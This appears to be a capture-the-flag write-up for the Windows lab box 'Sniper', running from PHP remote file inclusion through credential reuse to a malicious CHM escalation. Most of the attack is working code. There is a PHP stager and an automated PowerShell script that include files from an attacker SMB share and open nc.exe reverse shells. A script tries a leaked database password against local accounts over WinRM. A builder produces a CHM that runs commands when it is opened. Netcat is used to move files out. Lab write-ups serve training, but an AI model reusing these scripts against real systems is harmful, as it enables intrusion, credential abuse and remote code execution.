Sniper

Sniper is a medium-difficulty Windows box. The foothold is web based (a PHP include that accepts UNC paths), the user shell comes from credential reuse, and root comes from a malicious CHM file.
Recon
We start off by scanning Sniper's IP, 10.10.10.151, with nmap:
nmap -T4 -A -v 10.10.10.151
From our results we get the following services and ports:
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Supported Methods: GET POST
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Sniper Co.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Port 80 is open, which means the box is hosting a website, and navigating to http://10.10.10.151/ we find exactly that.
For the most part nothing is exceptionally interesting, except one URL: http://10.10.10.151/blog/?lang=blog-en.php
A ?lang= parameter that names a PHP file is the classic shape of a file inclusion bug: the value is probably handed straight to include(). If only local files can be included that is LFI; if we can point it at a file we control it becomes RFI and gives us code execution. Remote includes over http:// normally fail because allow_url_include is off by default, but PHP on Windows treats a UNC path (\\host\share\file.php) as a plain filesystem path, so that setting does not stop it. The nmap scan shows the box speaks SMB, so a share of our own that the target can reach anonymously is the way to get a shell.
apt-get install samba
mkdir -p /tmp/sniper/smb
chmod 777 /tmp/sniper/smb
For anonymous access we have to change our SMB config, /etc/samba/smb.conf. At the end of the file add a share; it is called pizza here to match the UNC paths used later, and path points at the directory we just created:
[pizza]
comment = Samba on Ubuntu
path = /tmp/sniper/smb
read only = no
browsable = yes
guest ok = yes
On current Samba releases guest access also needs map to guest = Bad User in the [global] section; if the include later fails silently, a rejected guest connection in /var/log/samba/ is the first thing to check. Also make sure the share folder has the permissions set above.
For these changes to take effect restart the smb service: service smbd restart
Windows doesn't natively come with netcat, so we have to download it and host it ourselves. We can get it from https://eternallybored.org/misc/netcat/ and place nc.exe in our share folder.
Once we have this, we start a local netcat listener and note our VPN address:
nc -lnvp 8888
ifconfig tun0 #get VPN IP
Perfect, we are ready to connect back to our machine from the target. Save the following as pizza.php in the share; PHP single-quoted strings collapse \\ to \, so every backslash in the UNC path is doubled:
<?php $answer = system('\\\\10.10.15.32\\pizza\\nc.exe 10.10.15.32 8888 -e powershell.exe'); echo $answer."</br>"; ?>
Then trigger the include by pointing lang= at the share:
http://10.10.10.151/blog/?lang=\\10.10.15.32\pizza\pizza.php
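The same attack as a script, added here as an example and not part of the original writeup. It runs on the attacker box under pwsh (which works on Linux) and assumes Samba exports /tmp/sniper/smb as a share named pizza, that our tun0 address is 10.10.14.32 and that nc -lnvp 8888 is already listening; all of those are assumptions, adjust them to your session. Before spending the reverse shell it includes a harmless marker page, which is the check worth doing: it tells an executed include apart from an error page or a page that merely reflects the parameter.

```powershell
# Added example, not from the original writeup. Assumes: Samba exports /tmp/sniper/smb
# as "pizza", our tun0 address is 10.10.14.32 and 'nc -lnvp 8888' is already listening.
$Target   = 'http://10.10.10.151/blog/'
$Attacker = '10.10.14.32'     # assumed: your tun0 address
$Share    = 'pizza'           # assumed: share name from smb.conf
$ShareDir = '/tmp/sniper/smb' # assumed: path exported by that share
$Port     = 8888

# Marker page: a random token proves the include executed our file.
$marker = 'RFI_OK_' + (Get-Random)
Set-Content -Path "$ShareDir/probe.php" -Value "<?php echo '$marker'; ?>"

# Stager. PHP single-quoted strings collapse \\ to \, so every backslash in the UNC
# path is doubled; the command PHP runs is \\10.10.14.32\pizza\nc.exe ...
$unc = "\\\\$Attacker\\$Share\\nc.exe"
Set-Content -Path "$ShareDir/shell.php" -Value "<?php system('$unc $Attacker $Port -e powershell.exe'); ?>"

function Get-UncIncludeUrl([string] $File) {
    # lang= goes straight to include(). A UNC path is a plain filesystem path to PHP
    # on Windows, so allow_url_include=Off does not apply. The backslashes are
    # URL-encoded so that no client or proxy rewrites them on the way.
    return $Target + '?lang=' + [uri]::EscapeDataString("\\$Attacker\$Share\$File")
}

function Test-UncInclude {
    $body = (Invoke-WebRequest -Uri (Get-UncIncludeUrl 'probe.php') -UseBasicParsing -TimeoutSec 15).Content
    return $body -like "*$marker*"
}

if (-not (Test-UncInclude)) {
    throw 'probe.php was not executed: check smbd logs for a rejected guest connection and the share path'
}
Write-Output "[+] UNC include confirmed, triggering shell.php (catch it on port $Port)"

# The request blocks for as long as nc.exe runs, so fire it in the background.
Start-Job -ArgumentList (Get-UncIncludeUrl 'shell.php') -ScriptBlock {
    param($Url) Invoke-WebRequest -Uri $Url -UseBasicParsing
} | Out-Null
```

If the probe fails but the page still loads, the include is running (the PHP error page would differ) but the target never reached the share; that is almost always the Samba guest configuration rather than the PHP side.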
Once our session is up we can look around for ways to get a user shell. Looking into C:\Users we find a user called Chris:
Directory: C:\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/9/2019 6:47 AM Administrator
d----- 4/11/2019 7:04 AM Chris
d-r--- 4/9/2019 6:47 AM Public
Since there is a site up we should check its web root, which here is C:\inetpub\wwwroot. Under it we find a directory called user and, inside that, db.php, which contains a database connection with a clear-text password: 36mEAhz/B8xQ~2VM. Passwords like this tend to be reused, so it is worth trying against the local accounts we saw, Chris first:
<?php
// Enter your Host, username, password, database below.
// I left password empty because i do not set password on localhost.
$con = mysqli_connect("localhost","dbuser","36mEAhz/B8xQ~2VM","sniper");
// Check connection
if (mysqli_connect_errno())
{
echo "Failed to connect to MySQL: " . mysqli_connect_error();
}
?>
Now that we have credentials, it's time to log in as that user.
Exploit
We can escalate to Chris locally with the recovered password and run our payload in his context. In the PowerShell session we got from the RFI, do the following (huge thanks to @3r3bu5 for this tip). First start a second listener on our machine:
nc -lnvp 6464 #local listener
Then, on the target:
$user = "sniper\Chris" #save a variable for Chris as the user
$password = ConvertTo-SecureString "36mEAhz/B8xQ~2VM" -AsPlainText -Force #wrap the clear-text db password in a SecureString, as PSCredential requires
$credential = New-Object System.Management.Automation.PSCredential ($user, $password) #create a PS credential object for Chris with the db password
Invoke-Command -ComputerName localhost -ScriptBlock { \\10.10.14.32\pizza\nc.exe 10.10.14.32 6464 -e powershell.exe } -Credential $credential #run nc from our smb share in the context of Chris
Both addresses are our tun0 IP for this session. Invoke-Command against localhost goes over WinRM, so this only works because the box has it enabled, and the scriptblock can reach our share from inside the WinRM session only because the share is anonymous: a WinRM session holds a network-logon token that cannot authenticate onward to a second host (the double-hop problem).
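The step above generalised a little, as an added example that is not part of the original writeup: instead of assuming the db password belongs to Chris, try it against each local account we saw under C:\Users over WinRM on localhost and launch the reverse shell as the first one that accepts it. It runs in the foothold shell on the target and assumes our tun0 address is 10.10.14.32, the share is named pizza and nc -lnvp 6464 is listening; the candidate list is the one from the C:\Users listing.

```powershell
# Added example, not from the original writeup. Run in the foothold shell on the target.
# Assumes our tun0 address is 10.10.14.32, the share is "pizza" and 'nc -lnvp 6464' is listening.
$AttackerIP = '10.10.14.32'       # assumed: your tun0 address
$Share      = 'pizza'             # assumed: anonymous share hosting nc.exe
$Port       = 6464
$Password   = '36mEAhz/B8xQ~2VM'  # from C:\inetpub\wwwroot\user\db.php
$Candidates = @('Chris', 'Administrator')   # local accounts listed under C:\Users

$secure = ConvertTo-SecureString $Password -AsPlainText -Force

function Test-LocalLogon([string] $User, [securestring] $Secret) {
    # A cheap whoami under the candidate credential. Invoke-Command errors on a bad
    # password, a disabled account or a missing WinRM listener; all of those count as "no".
    # Messages go to the warning stream so they do not pollute the function's return value.
    $cred = New-Object System.Management.Automation.PSCredential ("$env:COMPUTERNAME\$User", $Secret)
    try {
        return Invoke-Command -ComputerName localhost -Credential $cred -ErrorAction Stop -ScriptBlock { whoami }
    } catch {
        Write-Warning "$User : $($_.Exception.Message)"
        return $null
    }
}

foreach ($name in $Candidates) {
    $who = Test-LocalLogon -User $name -Secret $secure
    if (-not $who) { continue }
    Write-Output "[+] $name accepted the db password (whoami: $who)"
    $cred = New-Object System.Management.Automation.PSCredential ("$env:COMPUTERNAME\$name", $secure)
    # -ArgumentList carries our details into the remote scope, where script variables are
    # not visible. Reaching the share from inside the session works only because the share
    # is anonymous: the session's network-logon token cannot authenticate to a second host.
    Invoke-Command -ComputerName localhost -Credential $cred -ArgumentList $AttackerIP, $Share, $Port -ScriptBlock {
        param($Ip, $ShareName, $P)
        & "\\$Ip\$ShareName\nc.exe" $Ip $P -e powershell.exe
    }
    break
}
```

Invoke-Command is used for the probe rather than Start-Process -Credential because the latter needs a desktop session the IIS app pool does not have; WinRM only needs the listener the author's command already relies on.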
Now that we have a shell as Chris we can get our first flag:
cd C:\Users\Chris\Desktop
cat user.txt
Post Exploitation
Now that we have user we can dig around for root. Exploring C:\ reveals a directory called Docs; opening it gives us two files:
Directory: C:\Docs
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/11/2019 9:31 AM 285 note.txt
-a---- 4/11/2019 9:17 AM 552607 php for dummies-trial.pdf
The contents of note.txt:
Hi Chris,
Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.
Regards,
Sniper CEO.
Yikes! Looks like the CEO isn't too happy with us.
Let's keep digging. Chris's Downloads directory contains an instructions.chm, which looks interesting, so let's grab it and have a look.
We can use certutil to encode the file as base64, which makes it much easier to move over a text channel:
certutil -encode "instructions.chm" instructions.chm.txt
To transfer it we use netcat yet again (both addresses are our tun0 IP):
nc -lp 1234 > instructions.chm.txt #on local
cat instructions.chm.txt | \\10.10.14.32\pizza\nc.exe -w 3 10.10.14.32 1234 #on target
Now we can head over to a Windows machine to decode it:
certutil -decode instructions.chm.txt instructions.chm
certutil -encode wraps the base64 in -----BEGIN CERTIFICATE----- and -----END CERTIFICATE----- lines, so a plain base64 -d on Linux works too once those are stripped.
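Decoding on the attacker side instead of round-tripping through Windows, as an added example that is not from the original writeup. It runs under pwsh (Linux or Windows), uses the file names from the transfer above, and adds the check a practitioner wants after a netcat transfer: compare against a hash taken on the target beforehand with certutil -hashfile instructions.chm SHA256. The hash in the usage line is a placeholder to be replaced with the value the target printed.

```powershell
# Added example, not from the original writeup. Decodes certutil -encode output under pwsh
# and verifies it against the SHA256 that 'certutil -hashfile instructions.chm SHA256'
# printed on the target before the transfer.
function ConvertFrom-CertutilBlob {
    param(
        [Parameter(Mandatory)] [string] $InPath,   # text file written by certutil -encode
        [Parameter(Mandatory)] [string] $OutPath,  # decoded binary to write
        [string] $ExpectedSha256                   # hash printed by certutil -hashfile on the target
    )
    # certutil wraps the base64 in PEM-style armour lines that FromBase64String (and base64 -d) reject.
    $b64 = (Get-Content -Path $InPath | Where-Object { $_ -notmatch '^-----(BEGIN|END) CERTIFICATE-----' }) -join ''
    $bytes = [Convert]::FromBase64String($b64)   # whitespace and line breaks are ignored by .NET

    # .NET resolves relative paths against the process cwd, not PowerShell's current location.
    if (-not [IO.Path]::IsPathRooted($OutPath)) { $OutPath = Join-Path (Get-Location).Path $OutPath }
    [IO.File]::WriteAllBytes($OutPath, $bytes)

    if ($ExpectedSha256) {
        # Older certutil versions print the hash with spaces between bytes; normalise before comparing.
        $expected = ($ExpectedSha256 -replace '\s', '').ToUpperInvariant()
        $actual = (Get-FileHash -Path $OutPath -Algorithm SHA256).Hash
        if ($actual -ne $expected) {
            throw "SHA256 mismatch: got $actual, expected $expected (truncated or corrupted transfer?)"
        }
    }
    return $bytes.Length   # size of the decoded file, for a quick sanity check against the listing
}

# Usage; replace the placeholder with the hash certutil -hashfile printed on the target:
# ConvertFrom-CertutilBlob -InPath ./instructions.chm.txt -OutPath ./instructions.chm -ExpectedSha256 '<sha256 from target>'
```

A truncated netcat transfer (the -w 3 timeout firing early, for instance) still decodes cleanly into a shorter file, which is why the hash comparison matters more than a successful decode.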

Yikes, definitely a lot of bad blood here.
Fortunately it gives us a hint. The CEO's note said he was waiting for the documentation to be dropped in C:\Docs, and since what Chris has produced so far is a .chm, it stands to reason the documentation is expected as a .chm and that whoever plays the CEO will open whatever lands there.
Googling around shows that CHM files are exploitable: a CHM is compiled HTML, and the HTML Help ActiveX control it can embed supports a ShortCut command that launches an arbitrary program when the page is displayed, so code runs as whoever opens the file. (Nishang's Out-CHM automates the build described here.)
Back on Windows we create the CHM with HTML Help Workshop. Once the workshop is set up, create a new project, then create an HTML file carrying our payload:
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',cmd.exe, /c type C:\Users\Administrator\Desktop\root.txt > C:\Temp\root.txt,'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
Item1 is window,program,parameters for the ShortCut command, and x.Click() fires it without any user interaction. The output goes to C:\Temp, the directory we use for the transfer below.
Then edit the .hhp so it includes our HTML and opens it as the default topic (the project wizard fills in the rest of [OPTIONS]):
[OPTIONS]
Default topic=Untitled1.htm
[FILES]
Untitled1.htm
and compile. Once we have our .chm
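The same build done by script, as an added example that is not part of the original writeup (it is the same idea as Nishang's Out-CHM, written out here). It runs on a Windows box with HTML Help Workshop installed at its default path and writes the two project files above, compiles them with hhc.exe and checks that a .chm actually came out; the output directory, file names and payload command are assumptions chosen to match the rest of this writeup.

```powershell
# Added example, not from the original writeup. Builds a CHM whose default topic fires the
# HTML Help ShortCut command. Assumes HTML Help Workshop at its default install path.
function New-ShortcutChm {
    param(
        [Parameter(Mandatory)] [string] $Program,    # e.g. cmd.exe
        [Parameter(Mandatory)] [string] $Arguments,  # e.g. /c type ... > ...
        [Parameter(Mandatory)] [string] $OutDir,
        [string] $Hhc = 'C:\Program Files (x86)\HTML Help Workshop\hhc.exe'
    )
    New-Item -ItemType Directory -Path $OutDir -Force | Out-Null

    # Item1 is "window,program,parameters" for the HHCtrl ShortCut command; the script
    # clicks the invisible button so nothing depends on the reader interacting.
    $html = @"
<html><head><title>Documentation</title></head><body>
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',$Program,$Arguments,'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>x.Click();</SCRIPT>
</body></html>
"@
    # Default topic makes the payload page the one rendered when the CHM opens;
    # Compiled file is relative to the directory holding the .hhp.
    $hhp = @"
[OPTIONS]
Compiled file=payload.chm
Default topic=payload.htm
Title=Documentation

[FILES]
payload.htm
"@
    Set-Content -Path (Join-Path $OutDir 'payload.htm') -Value $html -Encoding Ascii
    Set-Content -Path (Join-Path $OutDir 'payload.hhp') -Value $hhp  -Encoding Ascii

    # hhc.exe's exit code is not a reliable success signal (it returns 1 on success),
    # so check for the compiled file instead.
    & $Hhc (Join-Path $OutDir 'payload.hhp') | Out-Null
    $chm = Join-Path $OutDir 'payload.chm'
    if (-not (Test-Path $chm)) { throw "hhc.exe did not produce $chm; run it by hand to see its errors" }
    return $chm
}

# Same payload as the hand-built page above: copy the Administrator flag to C:\Temp (assumed writable).
New-ShortcutChm -Program 'cmd.exe' -Arguments '/c type C:\Users\Administrator\Desktop\root.txt > C:\Temp\root.txt' -OutDir 'C:\Temp\chm'
```

Swapping the arguments for nc.exe on the share with a listener of ours is how the "session if you wanted it" variant works; the builder does not change.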
we can transfer it to the victim over HTTP with SimpleHTTPServer:
python -m SimpleHTTPServer 8088 #start server in the same directory as the payload
Invoke-WebRequest http://10.10.14.32:8088/pizza.chm -OutFile C:\Temp\pizza.chm #download the payload to the machine
Great, but how does that get us root? The CEO did say to "drop it here", so we copy our malicious CHM to C:\Docs and hope for the best:
cp C:\Temp\pizza.chm C:\Docs\
And voila, after a minute (once whatever plays the CEO opens it) we have our root flag in C:\Temp\root.txt, or a session as that user if the payload was a reverse shell instead.